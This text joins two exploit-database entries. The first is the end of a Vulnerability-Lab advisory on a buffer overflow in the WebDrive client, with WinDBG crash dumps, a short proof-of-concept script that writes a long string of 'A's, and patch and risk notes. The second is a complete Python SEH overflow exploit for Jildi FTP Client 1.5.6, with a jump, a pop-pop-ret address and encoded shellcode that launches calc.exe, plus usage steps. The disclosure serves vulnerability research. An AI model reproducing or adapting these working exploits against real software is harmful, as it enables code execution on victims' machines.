 0:000> !exchain
 001c8d20: webdrive+35a24e (005aa24e)
 001cb768: webdrive+1c0041 (00410041)
 Invalid exception stack at 00410041
 0:000> d 001cb768
 001cb768  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
 001cb778  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
 001cb788  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
 001cb798  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
 001cb7a8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
 001cb7b8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
 001cb7c8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
 001cb7d8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
 WebDAV over SSL
 ============================
 Crash Analysis using WinDBG:
 ============================
 (b88.ca0): Access violation - code c0000005 (!!! second chance !!!)
 eax=00000000 ebx=00000000 ecx=00410041 edx=775e660d esi=00000000 edi=00000000
 eip=00410041 esp=000a1238 ebp=000a1258 iopl=0         nv up ei pl zr na pe nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
 *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\ipworks9.dll - 
 ipworks9!IPWorks_SNPP_Get+0x57f:
 00410041 038d4df0e8da    add     ecx,dword ptr [ebp-25170FB3h] ss:0023:daf302a5=????????
 0:000>!exchain
 Invalid exception stack at 00410041
 FTP and FTP over SSL
 ============================
 Crash Analysis using WinDBG:
 ============================
 (834.70c): Access violation - code c0000005 (!!! second chance !!!)
 eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002d84f0 edi=00000000
 eip=775e64f4 esp=002d8488 ebp=002d84dc iopl=0         nv up ei pl nz na po nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
 ntdll!KiFastSystemCallRet:
 775e64f4 c3              ret
 0:000> !exchain
 002d8c1c: webdrive+35a24e (015da24e)
 002db664: 00410041
 Invalid exception stack at 00410041
 Amazon S3
 ============================
 Crash Analysis using WinDBG:
 ============================
 (a64.a98): Access violation - code c0000005 (!!! second chance !!!)
 eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002f8550 edi=00000000
 eip=775e64f4 esp=002f84e8 ebp=002f853c iopl=0         nv up ei pl nz na po nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
 ntdll!KiFastSystemCallRet:
 775e64f4 c3              ret
 0:000> !exchain
 002f8c7c: webdrive+35a24e (015da24e)
 002fb6c4: 00410041
 Invalid exception stack at 00410041
 SFTP
 ============================
 Crash Analysis using WinDBG:
 ============================
 (848.9a8): Access violation - code c0000005 (!!! second chance !!!)
 eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002380f8 edi=00000000
 eip=775e64f4 esp=00238090 ebp=002380e4 iopl=0         nv up ei pl nz na po nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
 ntdll!KiFastSystemCallRet:
 775e64f4 c3              ret
 0:000> !exchain
 00238824: webdrive+35a24e (015da24e)
 0023b26c: 00410041
 Invalid exception stack at 00410041
 FrontPage Server
 ============================
 Crash Analysis using WinDBG:
 ============================
 (cd4.710): Access violation - code c0000005 (!!! second chance !!!)
 eax=007ba9f0 ebx=05d29738 ecx=00000041 edx=05d2fd48 esi=faa912b8 edi=007ba9f0
 eip=003bff2b esp=007b8990 ebp=007b8994 iopl=0         nv up ei pl nz na pe nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
 *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe
 webdrive+0x30ff2b:
 003bff2b 66890c16        mov     word ptr [esi+edx],cx    ds:0023:007c1000=????
 0:000> !exchain
 007b89b4: webdrive+35a24e (0040a24e)
 007bb3fc: webdrive+360041 (00410041)
 Invalid exception stack at 00410041
 '''
 PoC: Exploitcode
 buffer="http://"
 buffer+="\x41" * 70000
 off=buffer
 try:
 	out_file = open("WebDrive.txt",'w')
 	out_file.write(off)
 	out_file.close()
 	print("[*] Malicious txt file created successfully")
 except:
 	print "[!] Error creating file"
 Reference(s):
 http://www.webdrive.com/products/webdrive/
 https://www.webdrive.com/products/webdrive/download/
 Solution - Fix & Patch:
 =======================
 The vulnerability can be patched by a secure parse and input restriction of the vulnerable URL/Adress parameters.
 Security Risk:
 ==============
 The security risk of the buffer overflow vulnerability in the URL/Address parameter is estimated as high. (CVSS 6.8)
 Credits & Authors:
 ==================
 metacom
 Disclaimer & Information:
 =========================
 The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
 or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
 in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
 or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
 consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
 policies, deface websites, hack into databases or trade with fraud/stolen material.
 Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
 Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
 Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
 Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
 Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
 Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
 Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
 electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
 Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
 is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
 (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
 				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
 -- 
 VULNERABILITY LABORATORY - RESEARCH TEAM
 SERVICE: www.vulnerability-lab.com
 CONTACT: research@vulnerability-lab.com
 PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
--- a/platforms/windows/local/37197.py
+++ b/platforms/windows/local/37197.py
@ -0,0 +1,58 @@
 #!/usr/bin/python
 #Author: Zahid Adeel
 #Title: Jildi FTP Client 1.5.6 (SEH) BOF
 #Version: 1.5.6 Build 1536
 #Software Link: http://usfiles.brothersoft.com/internet/ftp/jildiftp.zip
 #Tested on: WinXP Professional SP3
 #Date: 2015-06-03
 #EDB Ref.: https://www.exploit-db.com/exploits/37187/
 #Open jildi-poc.txt file and copy its content on clipboard. Then run Jildi FTP client, click on Connect icon and paste this string in server text input #field. On successful exploitation, you will see calc.exe running on your system.
 fname="jildi-poc.txt"
 junk = "A" * 10096
 n_seh = "\xeb\x06\x90\x90"
 ppr = "\x56\x0B\x01\x1B" # PPR in msjet40.dll
 #run your calc.exe
 shellcode=("\x89\xe5\xd9\xc2\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43"
 "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
 "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
 "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
 "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4b\x39\x43\x30"
 "\x45\x50\x43\x30\x45\x30\x4c\x49\x5a\x45\x56\x51\x49\x42\x52"
 "\x44\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x51\x42\x54\x4c\x4c\x4b"
 "\x56\x32\x54\x54\x4c\x4b\x52\x52\x56\x48\x54\x4f\x4f\x47\x50"
 "\x4a\x56\x46\x56\x51\x4b\x4f\x56\x51\x49\x50\x4e\x4c\x47\x4c"
 "\x43\x51\x43\x4c\x54\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54"
 "\x4d\x43\x31\x49\x57\x4b\x52\x4c\x30\x56\x32\x50\x57\x4c\x4b"
 "\x56\x32\x52\x30\x4c\x4b\x51\x52\x47\x4c\x43\x31\x58\x50\x4c"
 "\x4b\x51\x50\x43\x48\x4b\x35\x4f\x30\x54\x34\x51\x5a\x43\x31"
 "\x4e\x30\x56\x30\x4c\x4b\x51\x58\x45\x48\x4c\x4b\x56\x38\x47"
 "\x50\x43\x31\x49\x43\x5a\x43\x47\x4c\x47\x39\x4c\x4b\x56\x54"
 "\x4c\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e"
 "\x4c\x4f\x31\x58\x4f\x54\x4d\x45\x51\x58\x47\x50\x38\x4d\x30"
 "\x54\x35\x4c\x34\x45\x53\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x51"
 "\x34\x52\x55\x4d\x32\x50\x58\x4c\x4b\x50\x58\x51\x34\x45\x51"
 "\x49\x43\x52\x46\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45"
 "\x4c\x43\x31\x4e\x33\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x58\x50"
 "\x4d\x59\x50\x44\x47\x54\x51\x34\x51\x4b\x51\x4b\x45\x31\x56"
 "\x39\x50\x5a\x56\x31\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x50\x5a"
 "\x4c\x4b\x45\x42\x5a\x4b\x4d\x56\x51\x4d\x52\x4a\x45\x51\x4c"
 "\x4d\x4b\x35\x4f\x49\x43\x30\x45\x50\x43\x30\x56\x30\x45\x38"
 "\x56\x51\x4c\x4b\x52\x4f\x4c\x47\x4b\x4f\x4e\x35\x4f\x4b\x4b"
 "\x4e\x54\x4e\x50\x32\x5a\x4a\x45\x38\x49\x36\x4d\x45\x4f\x4d"
 "\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x45\x56\x43\x4c\x45\x5a\x4d"
 "\x50\x4b\x4b\x4b\x50\x54\x35\x54\x45\x4f\x4b\x50\x47\x54\x53"
 "\x52\x52\x52\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x49\x45\x43"
 "\x53\x45\x31\x52\x4c\x43\x53\x56\x4e\x45\x35\x54\x38\x45\x35"
 "\x45\x50\x41\x41")
 padding = "F" * (15000 - len(junk) -len(shellcode) - 8)
 poc = junk + n_seh + ppr + shellcode + padding
 fhandle = open(fname , 'wb')
 fhandle.write(poc)
 fhandle.close()